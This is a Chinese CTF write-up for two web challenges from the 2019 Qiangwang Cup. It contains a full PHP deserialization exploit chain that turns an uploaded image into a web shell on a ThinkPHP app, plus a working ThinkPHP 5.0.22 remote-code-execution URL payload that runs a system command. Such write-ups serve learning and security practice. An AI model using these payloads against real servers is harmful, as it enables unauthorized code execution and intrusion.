2019 强网杯 WriteUp

考完试才来看，贡献没多少。
队友们太强了。

仅仅做了web，就写下做出来的题吧，其它的就不放了。复现的后续添加。

Web

upload

注册登陆，发现文件上传，测试仅可上传图片，且只检测文件头。
随便找张图，在末尾添加shellcode，上传。
图片上传到了/upload/da5703ef349c8b4ca65880a05514ff89/目录。

扫描得到//www.tar.gz，得到源代码。

接下来审计源码，发现是用thinkphp实现的。
根据tp5的目录结构，审计tp5\application\web\controller下源码。

//Index.php

public function login_check(){
    $profile=cookie('user');
    if(!empty($profile)){
        $this->profile=unserialize(base64_decode($profile));
        $this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
        if(array_diff($this->profile_db,$this->profile)==null){
            return 1;
        }else{
            return 0;
        }
    }
}

存在反序列化。

寻找可利用的类。Register中存在__destruct()方法，调用this->checker->index()。

//Register.php

public function __destruct()
{
    if(!$this->registed){
        $this->checker->index();
    }
}

Profile类中存在__call()方法

//Profile.php

public function upload_img(){
    if($this->checker){
        if(!$this->checker->login_check()){
            $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
            $this->redirect($curr_url,302);
            exit();
        }
    }
    if(!empty($_FILES)){
        $this->filename_tmp=$_FILES['upload_file']['tmp_name'];
        $this->filename=md5($_FILES['upload_file']['name']).".png";
        $this->ext_check();
    }
    if($this->ext) {
        if(getimagesize($this->filename_tmp)) {
            @copy($this->filename_tmp, $this->filename);
            @unlink($this->filename_tmp);
            $this->img="../upload/$this->upload_menu/$this->filename";
            $this->update_img();
        }else{
            $this->error('Forbidden type!', url('../index'));
        }
    }else{
        $this->error('Unknow file type!', url('../index'));
    }
}

public function __call($name, $arguments)
{
    if($this->{$name}){
        $this->{$this->{$name}}($arguments);
    }
}

__call()方法可以实现调用Profile类中的任意方法。其中upload_img方法，可以实现更改文件名及其后缀。需要将ext置为true，checker置为false即可触发。

利用思路：
反序列化Register，将其checker指向一个Profile对象，析构时，调用Profile的魔术方法__call()，利用其调用upload_img()，修改之前上传的图马的文件后缀，从而getshell。

EXP:

<?php
namespace app\web\controller;

class Register
{
    public $checker;
    public $registed;
}

class Profile
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;
    public $index;
}

class Index
{
    public $profile;
    public $profile_db;
}

$obj           = new Register();
$obj->checker  = new Profile();
$obj->registed = false;

//刚才上传的图马
//http://117.78.28.89:31424/upload/da5703ef349c8b4ca65880a05514ff89/156005c5baf40ff51a327f1c34f2975b.png
$obj->checker->index   = "upload_img";
$obj->checker->ext=	true;
$obj->checker->upload_menu="da5703ef349c8b4ca65880a05514ff89";
//路径
$obj->checker->filename_tmp="../public/upload/da5703ef349c8b4ca65880a05514ff89/156005c5baf40ff51a327f1c34f2975b.png";
$obj->checker->filename="../public/upload/da5703ef349c8b4ca65880a05514ff89/shell.php";

$payload = base64_encode(serialize($obj));
echo $payload."\n";

//TzoyNzoiYXBwXHdlYlxjb250cm9sbGVyXFJlZ2lzdGVyIjoyOntzOjc6ImNoZWNrZXIiO086MjY6ImFwcFx3ZWJcY29udHJvbGxlclxQcm9maWxlIjo4OntzOjc6ImNoZWNrZXIiO047czoxMjoiZmlsZW5hbWVfdG1wIjtzOjU5OiIuLi9wdWJsaWMvdXBsb2FkL2RhNTcwM2VmMzQ5YzhiNGNhNjU4ODBhMDU1MTRmZjg5L3NoZWxsLnBocCI7czo4OiJmaWxlbmFtZSI7czo2MToiLi4vcHVibGljL3VwbG9hZC9kYTU3MDNlZjM0OWM4YjRjYTY1ODgwYTA1NTE0ZmY4OS9qaW5nemhlLnBocCI7czoxMToidXBsb2FkX21lbnUiO3M6MzI6ImRhNTcwM2VmMzQ5YzhiNGNhNjU4ODBhMDU1MTRmZjg5IjtzOjM6ImV4dCI7YjoxO3M6MzoiaW1nIjtOO3M6NjoiZXhjZXB0IjtOO3M6NToiaW5kZXgiO3M6MTA6InVwbG9hZF9pbWciO31zOjg6InJlZ2lzdGVkIjtiOjA7fQ==

Antsword连一下，cat /flag.

Flag:

flag{ce5cb05ff4af0881a044f1d79f59ad2e}

强网先锋-上单

一看是thinkphp，并且暴露了版本号5.0.22，想起来去年tp爆出来的rce。

thinkphp5 RCE https://paper.seebug.org/770/

payload:

http://117.78.28.89:32422/1/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

Flag:

flag{9cdb595d4de827acde9b45bb120615d6}